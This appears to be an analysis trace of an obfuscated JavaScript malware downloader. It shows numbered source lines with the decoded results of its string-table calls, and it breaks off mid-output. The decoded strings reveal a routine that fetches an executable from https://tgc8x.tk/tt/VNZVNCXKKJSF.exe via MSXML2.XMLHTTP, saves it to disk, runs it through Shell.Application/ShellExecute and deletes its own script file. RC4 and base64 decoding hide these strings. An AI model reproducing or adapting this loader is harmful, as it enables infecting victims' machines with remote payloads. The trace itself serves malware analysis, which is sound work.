3	function (_0xe99d3f, _0x318392) {	_0x5099(244,"dOyh") ➔ "]\x0e\xe58\xef" _0x5099(213,"SewZ") ➔ undefined _0x5099(244,"dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D" _0x5099(213,"SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c" _0x5099(266,"SewZ") ➔ "m\x89Y\xb8\." _0x5099(219,")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf" _0x5099(255,"CZq%") ➔ undefined _0x5099(244,"dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C" _0x5099(213,"SewZ") ➔ "\xfd\xdbYt\xbe\x96" _0x5099(266,"SewZ") ➔ "8\|\x0e\xf1\xed\xd1x"
4	_0xe99d3f = _0xe99d3f - 0xc8;
5	var _0x59ecb7 = _0x3974d[_0xe99d3f];
6	if ( _0x5099['GLbovs'] === undefined )
7	{
8	var _0x12b176 = function (_0x5c0ef3) {	_0x12b176("AXxcQSkOWRG") ➔ "k\x15\xaa\xa8\xb8" _0x12b176("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=") ➔ undefined _0x12b176("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f" _0x12b176("w1vrmSoRW7VdJCkJWOVdGaldVq") ➔ "[UQ2\xeb\xfb\xcd\xa3\x8b\xc0\x02\xfd" _0x12b176("nmkoFSotW53cKq") ➔ "4\x8e~\xd3\xdd\x91" _0x12b176("EMpdGSkmdSoXsCk+W6u") ➔ "zc\xc2\x8c\x0e\xf1I\xbe\xe5" _0x12b176("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined _0x12b176("W4yuy1BdPSoFWOOIgCo6qge") ➔ "\xc6\x14cV\xe6\xdf\x8a"\x19\xfa@a" _0x12b176("WQtdNh4FpYK") ➔ "\xa4\xdc~\x1f?)" _0x12b176("yxSPWPPSBJW") ➔ "a{)\x9aln<"
9	var _0x14b3e9 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
10	var _0x4b257a = '', _0x33ffaf = '';
11	for ( var _0x376b0b = 0x0, _0x404151, _0x27f080, _0x17fea0 = 0x0 ; _0x27f080 = _0x5c0ef3['charAt'] ( _0x17fea0 ++ ) ; ~ _0x27f080 && ( _0x404151 = _0x376b0b % 0x4 ? _0x404151 * 0x40 + _0x27f080 : _0x27f080, _0x376b0b ++ % 0x4 ) ? _0x4b257a += String['fromCharCode'] ( 0xff & _0x404151 >> ( - 0x2 * _0x376b0b & 0x6 ) ) : 0x0 )
12	{
13	_0x27f080 = _0x14b3e9['indexOf'] ( _0x27f080 );
14	}
15	for ( var _0x35b3aa = 0x0, _0x366407 = _0x4b257a['length'] ; _0x35b3aa < _0x366407 ; _0x35b3aa ++ )
16	{
17	_0x33ffaf += '%' + ( '00' + _0x4b257a['charCodeAt'] ( _0x35b3aa ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
18	}
19	return decodeURIComponent ( _0x33ffaf );	decodeURIComponent("%6b%15%c2%aa%c2%a8%c2%b8") ➔ "k\x15\xaa\xa8\xb8" decodeURIComponent("%00%10%83%10%51%87%20%92%8b%30%d3%8f%41%14%93%51%55%97%61%96%9b%71%d7%9f%82%18%a3%92%59%a7%a2%9a%ab%b2%db%af%c3%1c%b3%d3%5d%b7%e3%9e%bb%f3%df%bf") ➔ undefined decodeURIComponent("%c2%8c%c2%85%c2%95%29%c3%be%c2%8c%73%35%45%c2%92%40%66") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f" decodeURIComponent("%5b%55%51%32%c3%ab%c3%bb%c3%8d%c2%a3%c2%8b%c3%80%02%c3%bd") ➔ "[UQ2\xeb\xfb\xcd\xa3\x8b\xc0\x02\xfd" decodeURIComponent("%34%c2%8e%7e%c3%93%c3%9d%c2%91") ➔ "4\x8e~\xd3\xdd\x91" decodeURIComponent("%7a%63%c3%82%c2%8c%0e%c3%b1%49%c2%be%c3%a5") ➔ "zc\xc2\x8c\x0e\xf1I\xbe\xe5" decodeURIComponent("%1d%34%cf%4b%ff%d3%18%2f%17%4c%af%d3%4f%fb%e7%ce%f9%dc%c6%49%23%b1%f1%17") ➔ undefined decodeURIComponent("%c3%86%14%63%56%c3%a6%c3%9f%c2%8a%22%19%c3%ba%40%61") ➔ "\xc6\x14cV\xe6\xdf\x8a"\x19\xfa@a" decodeURIComponent("%c2%a4%c3%9c%7e%1f%3f%29") ➔ "\xa4\xdc~\x1f?)" decodeURIComponent("%61%7b%29%c2%9a%6c%6e%3c") ➔ "a{)\x9aln<"
20	};
21	var _0x50992b = function (_0x13f8d0, _0xbb7100) {	function (_0xe99d3f, _0x318392).eDkGFb("AXxcQSkOWRG","dOyh") ➔ "]\x0e\xe58\xef" function (_0xe99d3f, _0x318392).eDkGFb("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=","SewZ") ➔ undefined function (_0xe99d3f, _0x318392).eDkGFb("WOZcHCkvkCo+WOXZnuxcKKbM","dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D" function (_0xe99d3f, _0x318392).eDkGFb("w1vrmSoRW7VdJCkJWOVdGaldVq","SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c" function (_0xe99d3f, _0x318392).eDkGFb("nmkoFSotW53cKq","SewZ") ➔ "m\x89Y\xb8\." function (_0xe99d3f, _0x318392).eDkGFb("EMpdGSkmdSoXsCk+W6u",")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf" function (_0xe99d3f, _0x318392).eDkGFb("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","CZq%") ➔ undefined function (_0xe99d3f, _0x318392).eDkGFb("W4yuy1BdPSoFWOOIgCo6qge","dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C" function (_0xe99d3f, _0x318392).eDkGFb("WQtdNh4FpYK","SewZ") ➔ "\xfd\xdbYt\xbe\x96" function (_0xe99d3f, _0x318392).eDkGFb("yxSPWPPSBJW","SewZ") ➔ "8\|\x0e\xf1\xed\xd1x"
22	var _0x16801f = [], _0x374a29 = 0x0, _0x319ed0, _0x3b90fe = '';
23	_0x13f8d0 = _0x12b176 ( _0x13f8d0 );	_0x12b176("AXxcQSkOWRG") ➔ "k\x15\xaa\xa8\xb8" _0x12b176("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=") ➔ undefined _0x12b176("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f" _0x12b176("w1vrmSoRW7VdJCkJWOVdGaldVq") ➔ "[UQ2\xeb\xfb\xcd\xa3\x8b\xc0\x02\xfd" _0x12b176("nmkoFSotW53cKq") ➔ "4\x8e~\xd3\xdd\x91" _0x12b176("EMpdGSkmdSoXsCk+W6u") ➔ "zc\xc2\x8c\x0e\xf1I\xbe\xe5" _0x12b176("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined _0x12b176("W4yuy1BdPSoFWOOIgCo6qge") ➔ "\xc6\x14cV\xe6\xdf\x8a"\x19\xfa@a" _0x12b176("WQtdNh4FpYK") ➔ "\xa4\xdc~\x1f?)" _0x12b176("yxSPWPPSBJW") ➔ "a{)\x9aln<"
24	var _0x2e4578;
25	for ( _0x2e4578 = 0x0 ; _0x2e4578 < 0x100 ; _0x2e4578 ++ )
26	{
27	_0x16801f[_0x2e4578] = _0x2e4578;
28	}
29	for ( _0x2e4578 = 0x0 ; _0x2e4578 < 0x100 ; _0x2e4578 ++ )
30	{
31	_0x374a29 = ( _0x374a29 + _0x16801f[_0x2e4578] + _0xbb7100['charCodeAt'] ( _0x2e4578 % _0xbb7100['length'] ) ) % 0x100, _0x319ed0 = _0x16801f[_0x2e4578], _0x16801f[_0x2e4578] = _0x16801f[_0x374a29], _0x16801f[_0x374a29] = _0x319ed0;
32	}
33	_0x2e4578 = 0x0, _0x374a29 = 0x0;
34	for ( var _0x10039f = 0x0 ; _0x10039f < _0x13f8d0['length'] ; _0x10039f ++ )
35	{
36	_0x2e4578 = ( _0x2e4578 + 0x1 ) % 0x100, _0x374a29 = ( _0x374a29 + _0x16801f[_0x2e4578] ) % 0x100, _0x319ed0 = _0x16801f[_0x2e4578], _0x16801f[_0x2e4578] = _0x16801f[_0x374a29], _0x16801f[_0x374a29] = _0x319ed0, _0x3b90fe += String['fromCharCode'] ( _0x13f8d0['charCodeAt'] ( _0x10039f ) ^ _0x16801f[( _0x16801f[_0x2e4578] + _0x16801f[_0x374a29] ) % 0x100] );
37	}
38	return _0x3b90fe;
39	};
40	_0x5099['eDkGFb'] = _0x50992b, _0x304024 = arguments, _0x5099['GLbovs'] = ! ! [];
41	}
42	var _0x1bce3b = _0x3974d[0x0], _0x199af3 = _0xe99d3f + _0x1bce3b, _0x2d5575 = _0x304024[_0x199af3];
43	return ! _0x2d5575 ? ( _0x5099['IyeLFh'] === undefined && ( _0x5099['IyeLFh'] = ! ! [] ), _0x59ecb7 = _0x5099['eDkGFb'] ( _0x59ecb7, _0x318392 ), _0x304024[_0x199af3] = _0x59ecb7 ) : _0x59ecb7 = _0x2d5575, _0x59ecb7;	function (_0xe99d3f, _0x318392).eDkGFb("AXxcQSkOWRG","dOyh") ➔ "]\x0e\xe58\xef" function (_0xe99d3f, _0x318392).eDkGFb("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=","SewZ") ➔ undefined function (_0xe99d3f, _0x318392).eDkGFb("WOZcHCkvkCo+WOXZnuxcKKbM","dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D" function (_0xe99d3f, _0x318392).eDkGFb("w1vrmSoRW7VdJCkJWOVdGaldVq","SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c" function (_0xe99d3f, _0x318392).eDkGFb("nmkoFSotW53cKq","SewZ") ➔ "m\x89Y\xb8\." function (_0xe99d3f, _0x318392).eDkGFb("EMpdGSkmdSoXsCk+W6u",")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf" function (_0xe99d3f, _0x318392).eDkGFb("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","CZq%") ➔ undefined function (_0xe99d3f, _0x318392).eDkGFb("W4yuy1BdPSoFWOOIgCo6qge","dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C" function (_0xe99d3f, _0x318392).eDkGFb("WQtdNh4FpYK","SewZ") ➔ "\xfd\xdbYt\xbe\x96" function (_0xe99d3f, _0x318392).eDkGFb("yxSPWPPSBJW","SewZ") ➔ "8\|\x0e\xf1\xed\xd1x"
44	}, _0x5099 ( _0x304024, _0x5125dd );
45	}
46	var _0x445216 = _0x5099, _0x56566c = _0xe99d;
47	( function (_0x33d5a0, _0x4566fe) {	(function _0x3974(),418135) ➔ undefined (function _0x3974(),418135) ➔ undefined
48	var _0x29007c = _0xe99d, _0x24698b = _0x5099, _0x529399 = _0x33d5a0 ( );	_0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
49	while (! ! [ ] )
50	{
51	try
52	{
53	var _0x529eac = - parseInt ( _0x24698b ( 0xf4, 'dOyh' ) ) / 0x1 + parseInt ( _0x29007c ( 0xea ) ) / 0x2 * ( - parseInt ( _0x29007c ( 0x104 ) ) / 0x3 ) + parseInt ( _0x24698b ( 0xd5, 'SewZ' ) ) / 0x4 + - parseInt ( _0x24698b ( 0x10a, 'SewZ' ) ) / 0x5 + parseInt ( _0x29007c ( 0xe9 ) ) / 0x6 + - parseInt ( _0x24698b ( 0xdb, ')E2i' ) ) / 0x7 * ( parseInt ( _0x24698b ( 0xff, 'CZq%' ) ) / 0x8 ) + parseInt ( _0x29007c ( 0x105 ) ) / 0x9 * ( parseInt ( _0x29007c ( 0xf6 ) ) / 0xa );	_0x5099(244,"dOyh") ➔ "]\x0e\xe58\xef" parseInt("]\x0e\xe58\xef") ➔ NaN _0xe99d(234) ➔ "DeleteFile" parseInt("DeleteFile") ➔ NaN _0xe99d(260) ➔ "push" parseInt("push") ➔ NaN _0x5099(213,"SewZ") ➔ undefined _0x5099(244,"dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D" parseInt("\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D") ➔ NaN _0xe99d(234) ➔ "W4ZdJrRdRue" parseInt("W4ZdJrRdRue") ➔ NaN _0xe99d(260) ➔ "76392yWuOtG" parseInt("76392yWuOtG") ➔ 76392 _0x5099(213,"SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c" parseInt("\x02RvYjD\x89\x91\xc3\xec\xe0c") ➔ NaN _0x5099(266,"SewZ") ➔ "m\x89Y\xb8\." parseInt("m\x89Y\xb8\.") ➔ NaN _0xe99d(233) ➔ "DeleteFile" parseInt("DeleteFile") ➔ NaN _0x5099(219,")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf" parseInt("\x0b1\xd1E\xa5\x9e5\xf3\xaf") ➔ 1 _0x5099(255,"CZq%") ➔ undefined _0x5099(244,"dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C" parseInt("\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C") ➔ NaN _0xe99d(234) ➔ "421620Dulpsf" parseInt("421620Dulpsf") ➔ 421620 _0xe99d(260) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa" parseInt("W73dVr7dRxtcHSkIW4xcK27cLSoWWOa") ➔ NaN _0x5099(213,"SewZ") ➔ "\xfd\xdbYt\xbe\x96" parseInt("\xfd\xdbYt\xbe\x96") ➔ NaN _0x5099(266,"SewZ") ➔ "8\|\x0e\xf1\xed\xd1x" parseInt("8\|\x0e\xf1\xed\xd1x") ➔ 8 _0xe99d(233) ➔ "W4ZdJrRdRue" parseInt("W4ZdJrRdRue") ➔ NaN _0x24698b(219,")E2i") ➔ undefined _0x24698b(244,"dOyh") ➔ "36281KcZnqJ" parseInt("36281KcZnqJ") ➔ 36281 _0xe99d(234) ➔ "282elZIVv" parseInt("282elZIVv") ➔ 282 _0xe99d(260) ➔ "5991OPUtAM" parseInt("5991OPUtAM") ➔ 5991 _0x24698b(213,"SewZ") ➔ "356528XRGOsP" parseInt("356528XRGOsP") ➔ 356528 _0x24698b(266,"SewZ") ➔ "3057435mbhznI" parseInt("3057435mbhznI") ➔ 3057435 _0x29007c(233) ➔ "421620Dulpsf" parseInt("421620Dulpsf") ➔ 421620 _0x24698b(219,")E2i") ➔ "2016707DEhGJz" parseInt("2016707DEhGJz") ➔ 2016707 _0x24698b(255,"CZq%") ➔ "8ApAyti" parseInt("8ApAyti") ➔ 8 _0x29007c(261) ➔ "13285611Ofkcqp" parseInt("13285611Ofkcqp") ➔ 13285611 _0x29007c(246) ➔ "10MQXdOq" parseInt("10MQXdOq") ➔ 10
54	if ( _0x529eac === _0x4566fe )
55	break ;
56	else
57	_0x529399['push'] ( _0x529399['shift'] ( ) );
58	}
59	catch ( _0x1ed55f )
60	{
61	_0x529399['push'] ( _0x529399['shift'] ( ) );
62	}
63	}
64	} ( _0x3974, 0x66157 ) );
65	function _0x1c3e(_0x27f080, _0x17fea0) {	_0x1c3e(140) ➔ "463900CaNtRp" _0x1c3e(134) ➔ "xSkvWPCOWOniFvTXeCkMbCkL" _0x1c3e(140) ➔ "1268392teACcP" _0x1c3e(134) ➔ "5QEmMYO" _0x1c3e(138) ➔ "76392yWuOtG" _0x1c3e(128) ➔ "279BGVghm" _0x1c3e(131) ➔ "Scripting.FileSystemObject" _0x1c3e(142) ➔ "\VNZVNCXKKJSF.exe" _0x1c3e(135) ➔ "MSXML2.XMLHTTP" _0x1c3e(117) ➔ "Open"
66	var _0x35b3aa = _0x4a61 ( );	_0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu _0x4a61() ➔ 